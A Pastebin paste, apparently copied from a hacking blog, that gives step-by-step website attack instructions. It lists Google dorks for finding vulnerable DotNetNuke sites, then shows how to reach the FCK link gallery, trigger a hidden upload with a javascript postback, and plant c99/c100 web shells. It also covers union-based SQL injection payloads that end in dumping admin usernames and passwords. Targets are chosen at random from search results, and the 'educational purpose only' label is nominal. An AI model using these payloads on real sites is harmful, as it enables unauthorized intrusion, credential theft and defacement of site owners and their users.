Ben_salam

Website Hacking part 2

Mar 22nd, 2020
327
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Hello good morning, hope you're all well
  2. Happy to see you here again
  3. Today we'll talk about website hacking part 2 yeah of course
  4.  
  5. Portal Hacking (DNN) Technique:-
  6.  
  7. One more hacking method called “Portal Hacking (DNN)“. This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for hacking websites..
  8.  
  9. Here U can use dez two Google Dorks
  10.  
  11. 1- inurl:/portals/0
  12.  
  13. 2- inurl:/tabid/36/language/en-US/Default.aspx
  14.  
  15. You can also modify this google dork according to your need & requirement
  16.  
  17. Here is the exploit
  18. Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  19.  
  20. Step 1:
  21. http://www.google.com
  22.  
  23. Step 2:
  24. Now enter this dork
  25. :inurl:/tabid/36/language/en-US/Default.aspx
  26. This is a dork to find the Portal Vulnerable sites, use it wisely.
  27.  
  28. Step 3:
  29. you will find many sites, Select the site which you are comfortable with.
  30.  
  31. Step 4:
  32. For example take this site.
  33. http://www.abc.com/Home/tabid/36/Lan…S/Default.aspx
  34.  
  35. Step 5:
  36. Now replace
  37. /Home/tabid/36/Language/en-US/Default.aspx
  38. with this
  39. /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  40.  
  41.  
  42. HOME
  43. BLOG
  44. EVENTS
  45. SEO TOOLS
  46. CYBER SECURITY COURSES
  47. JOBS
  48. CONTACT
  49. HackersOnlineClub - Security Blog
  50.  
  51.  
  52. The Ultimate Information Security Certification Bundle
  53. Website Hacking
  54. Web Service Penetrating Testing
  55.  
  56.  
  57.  
  58.  
  59.  
  60. To Secure your own website first you need to learn How To Hack Websites With Different Techniques.
  61.  
  62. (EDUCATIONAL PURPOSE ONLY)
  63.  
  64. SQL Injection in MySQL Databases:-
  65.  
  66. SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
  67.  
  68.  
  69. Step 1:
  70.  
  71. When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
  72. www.site.com/page=1
  73.  
  74. or
  75. www.site.com/id=5
  76.  
  77. Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ‘ after the number in the url. For example:
  78.  
  79. www.site.com/page=1
  80.  
  81. If the database is vulnerable, the page will spit out a MySQL error such as;
  82.  
  83. Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
  84.  
  85. If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
  86.  
  87. Step 2
  88.  
  89. Now we need to find the number of union columns in the database. We do this using the “order by” command. We do this by entering “order by 1–“, “order by 2–” and so on until we receive a page error. For example:
  90.  
  91. http://www.site.com/page=1 order by 1–
  92. http://www.site.com/page=1 order by 2–
  93. http://www.site.com/page=1 order by 3–
  94. http://www.site.com/page=1 order by 4–
  95. http://www.site.com/page=1 order by 5–
  96.  
  97. If we receive another MySQL error here, then that means we have 4 columns. If the site errored on “order by 9” then we would have 8 columns. If this does not work, instead of — after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
  98.  
  99. Step 3
  100.  
  101. We now are going to use the “union” command to find the vulnerable columns. So we enter after the url, union all select (number of columns)–,
  102.  
  103. for example:
  104. www.site.com/page=1 union all select 1,2,3,4–
  105.  
  106. This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7– If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
  107.  
  108. Step 4
  109.  
  110. We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
  111.  
  112. user()
  113. database()
  114. version()
  115. or if these dont work try…
  116. @@user
  117. @@version
  118. @@database
  119.  
  120. For example the url would look like:
  121. www.site.com/page=1 union all select 1,user(),version(),4–
  122.  
  123. The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
  124.  
  125. IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
  126.  
  127. Step 5
  128.  
  129. In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
  130. UNION SELECT 1,table_name,3,4 FROM information_schema.tables–
  131.  
  132. So the url would look like:
  133. www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables–
  134.  
  135. Remember the “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
  136.  
  137. Step 6
  138.  
  139. In this Step we want to list all the column names in the database, to do this we use the following command:
  140. union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()–
  141.  
  142. So the url would look like this:
  143. www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()–
  144.  
  145. This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
  146.  
  147. Step 7
  148.  
  149. Finally we need to dump the data, so say we want to get the “username” and “password” fields, from table “admin” we would use the following command,
  150. union all select 1,2,group_concat(username,0x3a,password),4 from admin–
  151.  
  152. So the url would look like this:
  153. www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin–
  154.  
  155. Here the “concat” command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.
  156.  
  157.  
  158.  
  159.  
  160.  
  161. Portal Hacking (DNN) Technique:-
  162.  
  163. One more hacking method called “Portal Hacking (DNN)“. This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for hacking websites..
  164.  
  165. Here U can use dez two Google Dorks
  166.  
  167. 1- inurl:”/portals/0″
  168.  
  169. 2- inurl:/tabid/36/language/en-US/Default.aspx
  170.  
  171. You can also modify this google dork according to your need & requirement
  172.  
  173. Here is the exploit
  174. Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  175.  
  176. Step 1:
  177. http://www.google.com
  178.  
  179. Step 2:
  180. Now enter this dork
  181. :inurl:/tabid/36/language/en-US/Default.aspx
  182. This is a dork to find the Portal Vulnerable sites, use it wisely.
  183.  
  184. Step 3:
  185. you will find many sites, Select the site which you are comfortable with.
  186.  
  187. Step 4:
  188. For example take this site.
  189. http://www.abc.com/Home/tabid/36/Lan…S/Default.aspx
  190.  
  191. Step 5:
  192. Now replace
  193. /Home/tabid/36/Language/en-US/Default.aspx
  194. with this
  195. /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  196.  
  197. dnn
  198.  
  199. Step 6:
  200. You will get a Link Gallery page.So far so good!
  201.  
  202. Step 7:
  203. Dont do anything for now, wait for the next step…
  204.  
  205. Step 8:
  206. Now replace the URL in the address bar with a Simple Script
  207.  
  208. javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
  209.  
  210. Step 9:
  211. You will Find the Upload Option
  212.  
  213. Step 10:
  214. Select Root
  215.  
  216. Step 11:
  217. Upload your package Your Shell c99,c100 , Images, etc
  218.  
  219. After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have & upload here.
  220.  
  221. Now Go to main page and refresh. you have seen hacked the website.
  222.  
  223. Done..!!
  224.  
  225. Please share the link
  226. Join also our channel on telegram
  227. .
  228. http://t.me/Learnfreehacking0
Add Comment
Please, Sign In to add comment